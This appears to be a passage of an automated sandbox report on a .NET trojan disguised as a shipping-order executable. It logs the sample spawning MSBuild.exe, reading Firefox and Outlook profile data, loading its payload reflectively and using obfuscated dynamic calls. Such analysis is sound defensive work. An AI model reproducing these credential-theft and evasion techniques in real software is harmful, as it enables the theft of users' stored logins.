                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@3/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6424
                        Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\20b137fa-9b8e-4595-ab62-2d4bf784a153Jump to behavior
                        Source: ShippingOrder_ GSHS2400052.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ShippingOrder_ GSHS2400052.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: ShippingOrder_ GSHS2400052.exeReversingLabs: Detection: 34%
                        Source: ShippingOrder_ GSHS2400052.exeVirustotal: Detection: 42%
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeFile read: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe "C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe"
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6424 -s 2408
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: ShippingOrder_ GSHS2400052.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: ShippingOrder_ GSHS2400052.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: ShippingOrder_ GSHS2400052.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\Users\computer\Desktop\Outputs\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.PDB source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: SymbolDocumentGenerator.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.pdb0.7 source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.pdbMZ source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: .pdbm source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\symbols\exe\EemsbncoNl.pdbA source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdbMZ@ source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: EemsbncoNl.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Windows\EemsbncoNl.pdbpdboNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\EemsbncoNl.pdbpdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: symbols\exe\EemsbncoNl.pdbb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: indoC:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: 8C:\Windows\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdbSystem.Xml.ni.dll source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.pdb` source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Configuration.pdbShippingOrder_ GSHS2400052.exemscorlib.dll source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Users\user\Desktop\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ShippingOrder_ GSHS2400052.PDB@ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Windows\symbols\exe\EemsbncoNl.pdb` source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\computer\Desktop\Outputs\EemsbncoNl.pdb931}\ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C1E1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\exe\EemsbncoNl.pdb source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: System.ni.pdb source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: \??\C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.PDB source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2044055386.000000001C227000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER16C2.tmp.dmp.4.dr
                        Source: Binary string: C:\Users\user\Desktop\EemsbncoNl.pdb@ source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872745020.00000000010F4000.00000004.00000010.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, m0AlqHNW5c0F66NVdaA.cs.Net Code: Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777301)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777246)),Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777253))})
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, m0AlqHNW5c0F66NVdaA.cs.Net Code: Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777301)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777246)),Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777253))})
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, m0AlqHNW5c0F66NVdaA.cs.Net Code: Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777301)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777246)),Type.GetTypeFromHandle(IiL8TZuak9cFAGKmhoy.QpTKXxvutk(16777253))})
                        .NET source code contains potential unpacker
                        Source: ShippingOrder_ GSHS2400052.exe, OptionExerciseModelPythonWrapper.cs.Net Code: Initialize System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeCode function: 0_2_00007FFD9B8A443D push esi; retn 5E45h0_2_00007FFD9B8A4757
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeCode function: 0_2_00007FFD9B8A26AD push ebx; ret 0_2_00007FFD9B8A26BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01150B4D push edi; ret 1_2_01150CC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01150C95 push edi; retf 1_2_01150C3A
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, m0AlqHNW5c0F66NVdaA.csHigh entropy of concatenated method names: 'D3bK7UtAhAgXdmVYrQZ', 'XnjiGctMmSvifPTN8wh', 'p0DuZFYOGp', 'j5qppKt5fa16d0BkWJd', 'PNXI8WtUV6sLydRm0Lw', 'jol2oZtG23stFoeP4Ju', 'tfpm2OtHiaGrQGOeUmm', 'b6c2GutTiwlVhglBgrb', 'AEJ3qOt2Fl7DiUSyTls', 'BE8DdctjXdTNjYssDRd'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, oiioonoootoonrhromrm.csHigh entropy of concatenated method names: 'EvkvabAW', 'MkWZSatmpFrjwxdCxsm', 'UfHcE9tpgIss2RmmDfR', 'kOR9wetyrCsZviFoAoj', 't5wsUntsNxSdM91W7YN', 'onanriooeatlreiiaeai', 'YgAPOlXRc', 'KMsk2rXXV', 'bvRqpe9Oq', 'QUNUOk9zJTvvn1CqVMr'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, m0AlqHNW5c0F66NVdaA.csHigh entropy of concatenated method names: 'D3bK7UtAhAgXdmVYrQZ', 'XnjiGctMmSvifPTN8wh', 'p0DuZFYOGp', 'j5qppKt5fa16d0BkWJd', 'PNXI8WtUV6sLydRm0Lw', 'jol2oZtG23stFoeP4Ju', 'tfpm2OtHiaGrQGOeUmm', 'b6c2GutTiwlVhglBgrb', 'AEJ3qOt2Fl7DiUSyTls', 'BE8DdctjXdTNjYssDRd'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, oiioonoootoonrhromrm.csHigh entropy of concatenated method names: 'EvkvabAW', 'MkWZSatmpFrjwxdCxsm', 'UfHcE9tpgIss2RmmDfR', 'kOR9wetyrCsZviFoAoj', 't5wsUntsNxSdM91W7YN', 'onanriooeatlreiiaeai', 'YgAPOlXRc', 'KMsk2rXXV', 'bvRqpe9Oq', 'QUNUOk9zJTvvn1CqVMr'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, m0AlqHNW5c0F66NVdaA.csHigh entropy of concatenated method names: 'D3bK7UtAhAgXdmVYrQZ', 'XnjiGctMmSvifPTN8wh', 'p0DuZFYOGp', 'j5qppKt5fa16d0BkWJd', 'PNXI8WtUV6sLydRm0Lw', 'jol2oZtG23stFoeP4Ju', 'tfpm2OtHiaGrQGOeUmm', 'b6c2GutTiwlVhglBgrb', 'AEJ3qOt2Fl7DiUSyTls', 'BE8DdctjXdTNjYssDRd'
                        Source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, oiioonoootoonrhromrm.csHigh entropy of concatenated method names: 'EvkvabAW', 'MkWZSatmpFrjwxdCxsm', 'UfHcE9tpgIss2RmmDfR', 'kOR9wetyrCsZviFoAoj', 't5wsUntsNxSdM91W7YN', 'onanriooeatlreiiaeai', 'YgAPOlXRc', 'KMsk2rXXV', 'bvRqpe9Oq', 'QUNUOk9zJTvvn1CqVMr'
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
